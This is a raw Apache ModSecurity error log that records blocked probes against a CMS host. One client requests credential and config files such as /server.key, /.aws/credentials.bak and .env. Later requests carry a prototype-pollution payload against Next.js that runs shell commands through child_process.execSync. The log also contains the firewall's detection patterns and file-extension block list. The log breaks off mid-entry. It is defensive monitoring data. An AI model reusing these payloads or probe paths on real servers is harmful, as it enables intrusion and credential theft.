.ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/storage/logs/laravel.log"] [unique_id "aaEuRs_7XKceGHnFn7KN5gAAAQI"] [Fri Feb 27 07:40:22.988414 2026] [:error] [pid 19590:tid 19613] [client 185.177.72.52:13390] [client 185.177.72.52] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/server.key"] [unique_id "aaEuRtky4CVhPBJ_vGvrhQAAANU"] [Fri Feb 27 07:40:23.185853 2026] [:error] [pid 19414:tid 19495] [client 185.177.72.52:13394] [client 185.177.72.52] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/php5.ini"] [unique_id "aaEuR4l2XTe6vwfq2aEjvQAAABQ"] [Fri Feb 27 07:40:25.364963 2026] [:error] [pid 19590:tid 19612] [client 185.177.72.52:33122] [client 185.177.72.52] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/config.ini"] [unique_id "aaEuSdky4CVhPBJ_vGvrjAAAANQ"] [Fri Feb 27 07:40:25.564702 2026] [:error] [pid 19590:tid 19604] [client 185.177.72.52:33138] [client 185.177.72.52] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/.aws/credentials.bak"] [unique_id "aaEuSdky4CVhPBJ_vGvrjwAAAMw"] [Fri Feb 27 07:40:25.949053 2026] [:error] [pid 19590:tid 19603] [client 185.177.72.52:33162] [client 185.177.72.52] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/.bak"] [unique_id "aaEuSdky4CVhPBJ_vGvrkgAAAMs"] [Fri Feb 27 07:40:33.084407 2026] [authz_core:error] [pid 21508:tid 21527] [client 185.177.72.52:33526] AH01630: client denied by server configuration: /home/id/cms.dev-unit.com/.htaccess [Fri Feb 27 07:41:13.112646 2026] [access_compat:error] [pid 19414:tid 19475] [client 185.177.72.52:43000] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/core/app/.env [Fri Feb 27 07:41:13.141820 2026] [access_compat:error] [pid 19414:tid 19489] [client 185.177.72.52:43000] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/core/Datavase [Fri Feb 27 07:41:13.158366 2026] [access_compat:error] [pid 19414:tid 19485] [client 185.177.72.52:43000] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/core/persistence [Fri Feb 27 07:41:13.177232 2026] [access_compat:error] [pid 19414:tid 19499] [client 185.177.72.52:43000] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/core/src [Fri Feb 27 07:41:16.386015 2026] [:error] [pid 19419:tid 19544] [client 185.177.72.52:52240] [client 185.177.72.52] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/db.sql"] [unique_id "aaEufJIw8I6Qp-4wONXI_QAAAI4"] [Fri Feb 27 07:41:16.394493 2026] [:error] [pid 19419:tid 19530] [client 185.177.72.52:52240] [client 185.177.72.52] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/db_backup.sql"] [unique_id "aaEufJIw8I6Qp-4wONXI_gAAAIc"] [Fri Feb 27 07:41:16.778234 2026] [:error] [pid 21508:tid 21529] [client 185.177.72.52:52252] [client 185.177.72.52] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/debug.log"] [unique_id "aaEufM_7XKceGHnFn7KPSQAAAQc"] [Fri Feb 27 07:41:25.886777 2026] [:error] [pid 19590:tid 19616] [client 185.177.72.52:26302] [client 185.177.72.52] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/dump.sql"] [unique_id "aaEuhdky4CVhPBJ_vGvsrwAAANg"] [Fri Feb 27 07:41:28.335802 2026] [:error] [pid 21508:tid 21534] [client 185.177.72.52:26428] [client 185.177.72.52] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/error.log"] [unique_id "aaEuiM_7XKceGHnFn7KPggAAAQw"] [Fri Feb 27 07:42:03.014212 2026] [:error] [pid 19414:tid 19487] [client 185.177.72.52:22182] [client 185.177.72.52] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/log/development.log"] [unique_id "aaEuq4l2XTe6vwfq2aEkCQAAAAw"] [Fri Feb 27 07:42:03.986907 2026] [:error] [pid 19590:tid 19592] [client 185.177.72.52:22244] [client 185.177.72.52] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/logs/access.log"] [unique_id "aaEuq9ky4CVhPBJ_vGvtmwAAAMA"] [Fri Feb 27 07:42:03.997045 2026] [:error] [pid 19590:tid 19601] [client 185.177.72.52:22244] [client 185.177.72.52] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/logs/app.log"] [unique_id "aaEuq9ky4CVhPBJ_vGvtnAAAAMk"] [Fri Feb 27 07:42:04.020769 2026] [:error] [pid 19590:tid 19598] [client 185.177.72.52:22244] [client 185.177.72.52] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/logs/error.log"] [unique_id "aaEurNky4CVhPBJ_vGvtnQAAAMY"] [Fri Feb 27 07:42:18.982582 2026] [:error] [pid 19415:tid 19524] [client 185.177.72.52:51972] [client 185.177.72.52] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/php.ini"] [unique_id "aaEuuq1cZkWaKliZo9PiNgAAAE8"] [Fri Feb 27 15:28:40.223954 2026] [:error] [pid 19419:tid 19545] [client 20.104.124.39:35770] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Sat Feb 28 01:24:42.304713 2026] [:error] [pid 21508:tid 21523] [client 20.104.82.189:11201] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Sat Feb 28 23:14:55.471559 2026] [:error] [pid 12407:tid 12460] [client 20.104.124.39:18597] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Mon Mar 02 16:08:16.092516 2026] [:error] [pid 20707:tid 20719] [client 18.202.217.12:48640] [client 18.202.217.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('(whoami) 2>&1 || true',{'timeout':5000}).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'), {digest: found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:..."] [ve [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aaWZz29rPG1rCPhdkiH7qAAAAMo"] [Tue Mar 03 03:59:12.331974 2026] [:error] [pid 21979:tid 21981] [client 172.94.9.249:47536] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/graphql"] [unique_id "aaZAcP2xhCLtpShpTOoykgAAAMA"] [Tue Mar 03 03:59:12.331974 2026] [:error] [pid 21979:tid 21984] [client 172.94.9.249:47546] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aaZAcP2xhCLtpShpTOoykwAAAMM"] [Tue Mar 03 03:59:12.331990 2026] [:error] [pid 21862:tid 21922] [client 172.94.9.249:47508] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/_rsc"] [unique_id "aaZAcPh_lrWoDSo4I3RnvAAAAI0"] [Tue Mar 03 03:59:12.331990 2026] [:error] [pid 21862:tid 21932] [client 172.94.9.249:47562] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/rsc"] [unique_id "aaZAcPh_lrWoDSo4I3RnvQAAAJI"] [Tue Mar 03 03:59:12.332352 2026] [:error] [pid 21861:tid 